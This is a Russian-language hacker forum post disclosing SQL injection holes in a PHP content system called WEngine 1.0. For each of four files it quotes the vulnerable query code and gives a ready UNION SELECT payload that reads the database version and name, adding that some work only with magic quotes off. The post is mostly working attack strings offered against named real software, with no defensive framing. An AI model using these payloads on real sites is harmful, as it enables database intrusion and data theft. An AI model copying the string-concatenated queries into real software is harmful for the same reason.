Показать сообщение отдельно

  #8  
Старый 21.11.2009, 02:06
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Product: WEngine
Version: 1.0
Author: http://hot.ee

SQL-inj

file: /modules/news/index.php
PHP код:
$read $_GET['read'];
    
$newssql "select * from news where news_id = '$read'";
    
$newsresult mysql_query($newssql);
    
$newsrow mysql_fetch_array($newsresult); 
target: ?read=1'+union+select+1,2,3,version()/*

file:
user.php
PHP код:
$login $_POST['login'];
    
$password $_POST['password'];
    
$email $_POST['email'];
    
$entersql "SELECT * FROM users WHERE user_name = '$login'";
    
$enterresult mysql_query($entersql);
...
$entersql "SELECT user_password FROM users WHERE user_name =  '$login'"
Передача идет методом POST.
target: ?login=user'+union+select+1,2,3,4,5/*

file: mail.php
PHP код:
$send $_GET['sendid'];
    
$mail $_GET['mail'];
    if(
$mail == ""):
        print(
"Вы не ввели email!");
        exit;
    endif;
    
$newssql "select * from news where news_id = '$send'"
target: ?send=1'+union+select+1,version(),database(),4/*
Sql-inj не совсем обычная,вывод будет у вас на E-mail,так что его нужно вводить рабочий.

file: print.php
PHP код:
$print $_GET['print'];
    
$newssql "select * from news where news_id = '$print'";
    
$newsresult mysql_query($newssql);
    
$newsrow mysql_fetch_array($newsresult);
    
printf("<b>%s</b><hr>"$newsrow['news_name']); 
target: ?print=1'+union+select+1,version(),3,4/*

Так-же уязвимы еще некоторые файлы,но выкладывать это не вижу смысла,так как все скули однотипные.Для некоторых уязвимостей,необходимо MQ = off дабы кавычки пролетали свободно.

Последний раз редактировалось m0Hze; 21.11.2009 в 09:29..
 
Ответить с цитированием